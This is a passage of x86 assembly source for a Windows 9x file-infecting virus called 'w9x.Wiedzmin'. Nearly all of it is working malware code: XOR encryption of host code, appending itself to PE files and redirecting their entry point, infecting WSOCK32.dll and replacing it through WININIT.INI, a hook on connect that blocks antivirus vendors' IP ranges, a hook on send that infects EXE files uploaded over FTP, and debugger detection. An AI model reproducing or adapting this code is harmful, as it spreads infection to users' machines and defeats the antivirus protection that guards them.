  popad
  mov dword ptr [ebp+firstk],0
  push esi
  mov eax,dword ptr [ebp+key_next]
  xor ebx,ebx
@loop_it:                               ;=> IF 5 BYTES ARE ZEROES THEN DON'T CRYPT BELOW
  cmp byte ptr [edx],00h
  jne @go_
  cmp byte ptr [edx+1],00h
  jne @go_
  cmp byte ptr [edx+2],00h
  jne @go_
  cmp byte ptr [edx+3],00h
  jne @go_
  cmp byte ptr [edx+4],00h
  je @crypted
@go_:
  xor byte ptr [edx],al
  inc edx
  loop @loop_it
  jmp @e_out
@crypted:
  pop esi
  mov eax,dword ptr [ebp+e_bytes]
  sub eax,ecx
  mov dword ptr [ebp+e_bytes],eax
  jmp @e_out
@e_error:
@e_out:
  pop eax
  cmp dword ptr [ebp+help_virus],1
  je @mute_other_virus
  popad
  ret

;ENTRY: EDI - BUFFER
@combine_key:
  mov eax,dword ptr [ebp+key2]
  stosd
  add eax,dword ptr [ebp+key]
  lea edi,[ebp+key_main]
  stosd
  ret

;**************************************************************************
;UNCRYPT *|*
;**************************************************************************
@uncrypt:
  call delta_e
delta_e:
  pop ebp
  sub ebp,offset delta_e
  pushad
  mov edx,dword ptr [ebp+imagebase]
  add edx,dword ptr [ebp+hosteip]
  mov ecx,dword ptr [ebp+e_bytes]
  xor ebx,ebx
  mov eax,[ebp+key_next]
@lloop_it:
  xor byte ptr [edx],al
  inc edx
  loop @lloop_it
f_e:
  cmp dword ptr [ebp+czy_je],0
  jne @helper_endd
  popad
  ret
@helper_endd:
  popad
  mov eax,dword ptr [ebp+hosteip]
  add eax,dword ptr [ebp+imagebase]
  jmp eax
czy_je    dd 0
e_bytes   dd 0
e_where   dd 0
e_god     dd 0
hosteip   dd 0
imagebase dd 0
key_next  dd 0
@helper_end:
  nop

;***********************************************************
@mute_other_virus:
  mov eax,dword ptr [ebp+fMapReal]
  mov esi,[eax+3ch]
  add esi,eax                           ;ESI => PE HEADER
  mov edi,esi
  xor eax,eax
  mov ax,[esi+06h]                      ;load number of sections
  mov ecx,28h                           ;28 bytes for each section header
  dec eax                               ;seeking for last,...
  mul ecx                               ;and mul it
  add esi,eax                           ; Normalize
  add esi,78h                           ; Ptr to dir table
  mov edx,[edi+74h]                     ; EDX = number of dir entries
  shl edx,3                             ; EDX = EDX*8
  add esi,edx                           ; ESI = Ptr to last section
  mov edx,[esi+10h]                     ; EDX = SizeOfRawData
  mov ebx,edx                           ; EBX = EDX
  add edx,[esi+14h]                     ; EDX = EDX+PointerToRawData
  push edx                              ; Preserve EDX
  mov eax,ebx                           ; EAX = EBX
  add eax,[esi+0Ch]                     ; EAX = EAX+VA Address
                                        ; EAX = New EIP
  mov [edi+28h],eax                     ; Change the new EIP
  mov dword ptr [ebp+NewEIP],eax        ; Also store it
  mov eax,dword ptr [ebp+fSize]
  add eax,helper
  mov ecx,[edi+3Ch]
  call Align_
  mov [esi+10h],eax
  mov [esi+08h],eax
  pop edx
  mov eax,[esi+10h]
  add eax,[esi+0Ch]
  mov [edi+50h],eax
  lea esi,[ebp+@uncrypt]                ; ESI = Ptr to virus_start
  xchg edi,edx                          ; EDI = Raw ptr after last
  add edi,dword ptr [ebp+fMapReal]      ;EDI = Normalized ptr
  mov ecx,helper
  mov dword ptr [ebp+czy_je],1
  rep movsb
  push dword ptr [ebp+offset fMapReal]
  call dword ptr [ebp+_UnmapViewOfFile]
  push dword ptr [ebp+fHndMap]
  call dword ptr [ebp+_CloseHandle]
  mov ecx,dword ptr [ebp+fSize]
  add ecx,helper
  call @zostaf
  push dword ptr [ebp+fHnd]
  call dword ptr [ebp+_CloseHandle]
  popad
  ret

;************************************************************************************************
;Wsock32 hooker!!!
;************************************************************************************************
@wsockz:
  mov eax,dword ptr [ebp+_GetSystemDirectoryA]
  mov ebx,dword ptr [ebp+_GPA]
  push 260
  lea eax,[ebp+sysDIR]
  push eax
  call dword ptr [ebp+_GetSystemDirectoryA]
  lea eax,[ebp+offset winDIRr]
  push 260
  push eax
  call dword ptr [ebp+_GetWindowsDirectoryA]
  lea edi,[ebp+sysDIR]
  lea esi,[ebp+wsock]
  call strcat
  lea edi,[ebp+winDIRr]
  lea esi,[ebp+nowe]
  call strcat
  push 1
  lea eax,[ebp+winDIRr]
  push eax
  lea eax,[ebp+sysDIR]
  push eax
  call dword ptr [ebp+_CopyFileA]
  cmp eax,0
  je bye
  lea edi,[ebp+finddata.cFileName]
  lea esi,[ebp+winDIRr]
  call strcat
  mov dword ptr [ebp+go_wsock],1
  push dword ptr [ebp+hosteip]
  push dword ptr [ebp+imagebase]
  call @infect
  pop dword ptr [ebp+imagebase]
  pop dword ptr [ebp+hosteip]
  cmp edx,-1
  je bye
  mov dword ptr [ebp+capis],0
  mov eax,dword ptr [ebp+fMapReal]
  mov dword ptr [ebp+wsock_h],eax
  call @go_export
  call _God
  mov dword ptr [ebp+go_wsock],0
  lea eax,[ebp+WININIT]
  push eax
  lea eax,[ebp+winDIRr]
  push eax
  lea eax,[ebp+sysDIR]
  push eax
  lea eax,[ebp+rename]
  push eax
  call dword ptr [ebp+_WritePrivateProfileStringA]
bye:
  ret

;************************************************************************************************
;STRCAT !!!
;It's smaller and faster (I think - but not optimized with repz)
;ENTRY:
;edi - base buffer
;esi - string to concatenate
;************************************************************************************************
strcat:
  push esi
  mov esi,edi
sstrcat:
  lodsb
  cmp al,0
  jne sstrcat
  dec esi
  mov edi,esi
  pop esi
cat_it:
  lodsb
  cmp al,0
  je le
  stosb
  jmp cat_it
le:
  ret

;************************************************************************************************
;Filez with 'a','A','E','e','v','V' at start - won't be infected ;]
;************************************************************************************************
@bad_name:
  xor edi,edi
  lea esi,[ebp+finddata.cFileName]
_letra:
  lodsb
  cmp al,'a'
  je error_a
  cmp al,'A'
  je error_a
  cmp al,'E'
  je error_a
  cmp al,'e'
  je error_a
  cmp al,'v'
  je error_a
  cmp al,'V'
  je error_a
  ret
error_a:
  inc edi
  ret

;================================================================================================
;BYTE CRYPTING ENGINE ;] SIMPLE BUT FACKING AVERZ
;================================================================================================
@GGEN_KEY:
  cmp dword ptr [ebp+firstk],1
  jne @go__
  mov ebx,40h
  mov dword ptr [ebp+key2],0h
  jmp GEN_KEY
@go__:
  mov dword ptr [ebp+offset key],0000000h
  mov ebx,55h
GEN_KEY:
  call dword ptr [ebp+_GetTickCount]
  idiv ebx                              ;remainder in EDX ;) a much simpler random number
  cmp edx,ebx                           ;algorithm than T2000/Immortal Riot's
  jae GEN_KEY
  inc edx                               ;WE MUST ENCODE SOMETHING, AT LEAST BY +1
  cmp dword ptr [ebp+firstk],1
  je @go___
  mov dword ptr [ebp+offset key],edx
@go___:
  mov dword ptr [ebp+offset key2],edx
  ret

@CRYPT_BYTEZ:
  mov ecx,edx
Try_crypt:
  lodsb                                 ;read a byte, damn :P it's in AL
  cmp al,0
  je _zero
  cmp al,07h
  je _retprog
_next:
  add al,cl
  stosb
  jmp Try_crypt
_zero:
  inc edi
  jmp Try_crypt
_retprog:
  ret

@UN_CRYPT_BYTEZ:
  mov ecx,dword ptr [ebp+offset key]
Try_uncrypt:
  lodsb
  cmp al,0h
  je _zero0
  cmp al,07h
  je ret0
_next0:
  sub al,cl
  stosb
  jmp Try_uncrypt
_zero0:
  inc edi
  jmp Try_uncrypt
ret0:
  ret
;================================================================================================ ;HOOKER DATA ;================================================================================================ start_h: hooked_connect: call get_delta pushad mov edx,[esp+(10*4)] ; EDX = sockaddr mov ecx,[edx+(2*2)] ; ip shl ecx,8 ; last octet lea esi,[eax+DENIED] mov edi,eax ;save EAX in EDI scan_denied: lodsd dec esi shl eax,8 jz TOC cmp ecx,eax jne scan_denied push WSAHOST_NOT_FOUND call dword ptr [edi+_WSASetLastError] popad push -1 pop eax jmp out_c TOC: ;tHe oRgInal coNneCt ;] popad push [esp+0Ch] ;int namelen push [esp+4+8] ;const struct sockaddr FAR* name push [esp+8+4] ;SOCKET s call dword ptr [eax+a_connect] ;call orginal connect!!! out_c: retn 0Ch ;//////////////////////////////////////////////hooked send/////////////////////////////////////// hooked_send: call get_delta pushad mov edi,eax mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf) mov eax,[ebx] cmp eax,'ROTS' ;FTP: Storing a file ? ;) je _ftp_store TOS: popad ;tHe oRgInaL sEnd push [esp+10h] ;int flags push [esp+4+0Ch] ;int len push [esp+8+8] ;const char FAR * buf push [esp+0Ch+4] ;SOCKET s call dword ptr [eax+a_send] ;call orginal send!!! out_s: retn 10h _ftp_store: ;yeah! infect on tha fly mov edx,[esp+28h] ;point to name =] add edx,5 ;skip STOR and one space (5 bytes) mov esi,[esp+28h] @loop: lodsb cmp al,'.' ;find first dod jne @loop dec esi mov esi,[esi] ;a exe file!? cmp esi,'EXE.' je try_it cmp esi,'exe.' je try_it jmp TOS try_it: mov ecx,edi lea edi,[ecx+offset buff] mov esi,edx xor edx,edx _l: lodsb cmp al,0dh je _end stosb inc edx jmp _l mov edi,edx _end: lea edx,[ecx+offset buff] lea ebx,[ecx+offset inf_prog] push ecx ;preserve ecx push ebx push 260 call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory ;ftp clients use that to locate ;file. 
        pop     ecx                     ;load ecx
        mov     eax,edi
        xor     ebx,ebx
        lea     esi,[ecx+offset inf_prog]
_loop_1:
        lodsb
        inc     ebx
        cmp     al,0
        jne     _loop_1
_do:
        lea     edi,[ecx+offset inf_prog] ;add \ to path ;]
        add     edi,ebx
        dec     edi
        mov     al,'\'
        stosb
        lea     esi,[ecx+offset buff]
_l2:                                    ;well optimised strcat
        lodsb
        cmp     al,0
        je      _skipp
        stosb
        jmp     _l2
_skipp:
        lea     esi,[ecx+offset santa]
        lea     edi,[ecx+offset inf_prog2]
_cat:
        lodsb
        cmp     al,0
        je      _catt
        stosb
        jmp     _cat
_catt:
        mov     al,' '
        stosb
        lea     esi,[ecx+offset inf_prog]
_make_real:
        lodsb
        cmp     al,0
        je      done
        stosb
        jmp     _make_real
done:
        mov     edi,ecx
        push    1
        lea     eax,[edi+offset inf_prog2]
        push    eax
        call    dword ptr [edi+wex]
        jmp     TOS
reset_err:
        push    WSAECONNRESET
        call    dword ptr [edi+_WSASetLastError]
        popad
        push    -1
        pop     eax
        jmp     out_s
;/*END-------------------------------------------------------------------------------------------
get_delta:
        call    @hookerdelta
@hookerdelta:
        pop     eax
        sub     eax,offset @hookerdelta
        ret

my_data:
a_send          dd 0
a_connect       dd 0
msgg            dd 0BFF44146h
DO_WPISU:
_WSASetLastError dd 0
wex             dd 0
gcd             dd 0
WSAHOST_NOT_FOUND equ 11001
WSAECONNRESET   equ 10054
buff            db 110 dup (0)
inf_prog2       db 260 dup (0)
inf_prog        db 260 dup (0)
santa           db 'C:\Program Files\deithwen.exe',0
;santa          db 'C:\WINDOWS\CALC.EXE',0

;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
DENIED:
        DB 161,069,003          ; nai.com
        DB 216,122,008          ; avp.com
        DB 195,170,248          ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
        DB 193,247,150          ; avp.ch, metro.ch
        DB 194,252,006          ; datafellows.com, f-secure.com
        DB 195,112,025          ; drsolomon.com
        DB 208,228,231          ; mcafee.com
        DB 194,203,134          ; sophos.com
        DB 146,145,148          ; norman.com
        DB 206,204,003          ; pandasoftware.com
        DB 193,004,210          ; complex.is
        DB 203,037,250          ; leprechaun.com.au
        DB 141,202,248          ; cai.com
        DB 216,033,022          ; antivirus.com, trendmicro.com
        DB 216,035,137          ; sarc.com
        DB 216,086,104          ; virus.com
        DB 212,029,228          ; invircible.com
        DB 208,226,167          ; symantec.com
        DB 207,227,040          ; grisoft.com
        DB 194,105,193          ; drweb.ru
        DB 000,000,000          ; end of table.
hook_end label byte

;________________________________________________________________________________________________
;============================================================================================DATA
;________________________________________________________________________________________________
;**APIZ TO HOOK**
A1      db 'send',0
A1s     equ $-A1
A2      db 'connect',0
A2s     equ $-A2
e_esi   dd 0
APIS    db 'GetProcAddress',0
APIS_SIZE = $ - APIS
APIList:
        db "FindFirstFileA",0
        db "FindNextFileA",0
        db "FindClose",0
        db "SetFileAttributesA",0
        db "SetFileTime",0
        db "CreateFileA",0
        db "CreateFileMappingA",0
        db "MapViewOfFile",0
        db "UnmapViewOfFile",0
        db "GetFileTime",0
        db "GetFileSize",0
        db "GetFileAttributesA",0
        db "SetFileAttributesA",0
        db "ReadFile",0
        db "WriteFile",0
        db "SetFilePointer",0
        db "SetEndOfFile",0
        db "CloseHandle",0
        db "SetCurrentDirectoryA",0
        db "GetWindowsDirectoryA",0
        db "GetSystemDirectoryA",0
        db "CopyFileA",0
        db "ExitProcess",0
        db "GetTickCount",0
        db "GetCommandLineA",0
        db "IsDebuggerPresent",0
        db "OutputDebugStringA",0
        db "WinExec",0
        db "LoadLibraryA",0
        db "GetModuleHandleA",0
        db "Sleep",0
        db "GetSystemTime",0
        db "WritePrivateProfileStringA",0
        db "VirtualAlloc",0
        db "VirtualFree",0
        db "GetCurrentDirectoryA",0,07h   ;07h stops the lookup
msg     dd 0BFF44146h
key     dd 0
;shit7  db "w.dll",0
marker  db 'sru.exe',0
;marker db '*.exe',0

TO_CRYPT_DATA:
to_ja:  db 0ah,0dh
        db "",0ah,0dh
        db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
        db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
        db "Ć Deithwen Addan Flared Again",0ah,0dh
        db "Ć You have eyez, but u can't see",0ah,0dh
        db "Ć You have earz, but u can't hear",0ah,0dh
        db "Ć Wake up from unreal world before",0ah,0dh
        db "Ć you drown in the Sea of Chaos.",0ah,0dh
        db "",0ah,0dh
        db "ĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽĽ",0ah,0dh
        db 0ah,0dh,0
wsock   db "\WSOCK32.dll",0
nowe    db "\WZZOCK32.dll",0
sice9x  db "\\.\SICE",0
sle     db "WSASetLastError",0
user32  db "USER32.DLL",0
gdi32   db "GDI32.DLL",0
WININIT db "WININIT.INI",0
rename  db "rename",0
jed     db "X",0
famil   db "Verdana",0
logo    db ": w9x.WiEDZMiN has you :",0
deshit  db "kfe",0,07h

@crypt_my_body:
        push    ecx
        call    dword ptr [ebp+_GetTickCount]
        mov     ebx,255
        idiv    ebx
        mov     ecx,edx
@mutualisk:
        mov     byte ptr [edi],90h
        inc     edi
        loop    @mutualisk
        pop     ecx
        pushad
        lea     edx,[ebp+offset @to_this]
        mov     eax,[ebp+key_main]
        mov     ecx,TO_DE
@loop_decryptt:
        xor     byte ptr [edx],al
        inc     edx
        loop    @loop_decryptt
@end_de:
        popad
        rep     movsb
        mov     edi,'!PUY'
        call    @main_decryptor
        ret
key_main dd 0
;       db 5 dup (90h)
;       align dword
VirusEnd label byte

;==================================================FIND=========================================
;=============================================VirtualData does not go into the virus===========
HeapStart label byte
finddata WIN32_FIND_DATA <>             ;pointer to the structure
fileHandle      dd 0
fileAtrib       dd 0
licznik_b       dd 0
APIListA:
_FindFirstFileA dd 0
_FindNextFileA  dd 0
_FindClose      dd 0
_SetAttributesA dd 0
_SetFileTime    dd 0
_CreateFileA    dd 0
_CreateFileMappingA dd 0
_MapViewOfFile  dd 0
_UnmapViewOfFile dd 0
_GetFileTime    dd 0
_GetFileSize    dd 0
_GetFileAttributesA dd 0
_SetFileAttributesA dd 0
_ReadFile       dd 0
_WriteFile      dd 0
_SetFilePointer dd 0
_SetEndOfFile   dd 0
_CloseHandle    dd 0
_SetCurrentDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_CopyFileA      dd 0
_ExitProcess    dd 0
_GetTickCount   dd 0
_GetCommandLineA dd 0
_IsDebuggerPresent dd 0
_OutputDebugStringA dd 0
_WinExec        dd 0
_LoadLibraryA   dd 0
_GetModuleHandleA dd 0
_Sleep          dd 0
_GetSystemTime  dd 0
_WritePrivateProfileStringA dd 0
_VirtualAlloc   dd 0
_VirtualFree    dd 0
_GetCurrentDirectoryA dd 0
@GDI_APIZA:
_CreateFontA    dd 0
_TextOutA       dd 0
_SetBkMode      dd 0
_SetTextColor   dd 0
_SelectObject   dd 0
_GetSystemMetrics dd 0
_GetDesktopWindow dd 0
_GetWindowDC    dd 0
_ReleaseDC      dd 0
SYSTEM_TIME:
wYear           dw 0
wMonth          dw 0
wDayOfWeek      dw 0
wDay            dw 0
wHour           dw 0
wMinute         dw 0
wSecond         dw 0
wMilliseconds   dw 0
F1:     dd 2 dup (?)
F2:     dd 2 dup (?)
F3:     dd 2 dup (?)
vbuf            dd 0
help_virus      dd 0
memory          dd 0
header          dd 0
align           dd 0
_hostIP         dd 0
_secAlign       dd 0
newEIP          dd 0
NewEIP          dd 0
firstk          dd 0
key2            dd 0
go_wsock        dd 0
wsock_h         dd 0
moj_address     dd 0
capis           dd 0
wsock_hh        dd 0
NON             dd 0            ;number of names
AOF             dd 0            ;addr of Functions
AON             dd 0            ;addr of Names
AOO             dd 0            ;addr of Ordinals
IndexA          dd 0
_GPA            dd 0
fHnd            dd 0
fHndMap         dd 0
fMapReal        dd 0
fSize           dd 0
my_seh          dd 0
was_win         dd 0
ic              dd 0
sHnd            dd 0
shitsize        dd 0
oldDIR          db 512 dup (?)
winDIR          db 260 dup (?)
sysDIR          db 260 dup (?)
winDIRr         db 260 dup (?)
                db 5 dup (?)
toHOST          dd 0
;               align dword
HeapEnd label byte

titlee  db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy   db "Elaine blath, Feainnewedd",0ah,0dh
        db "Dearme aen a'caelme tedd",0ah,0dh
        db "Eigean evelienn deireadh",0ah,0dh
        db "Que'n esse, va en esseath",0ah,0dh
        db "Feainnewedd, elaine blath!"
        db 0ah,0dh
virussizee db " bytes",0

fakehost:
        push    0h
        push    offset titlee
        push    offset bodyy
        push    0h
        call    MessageBoxA
        push    0h
        call    ExitProcess
endshit:
        ends
End     v_start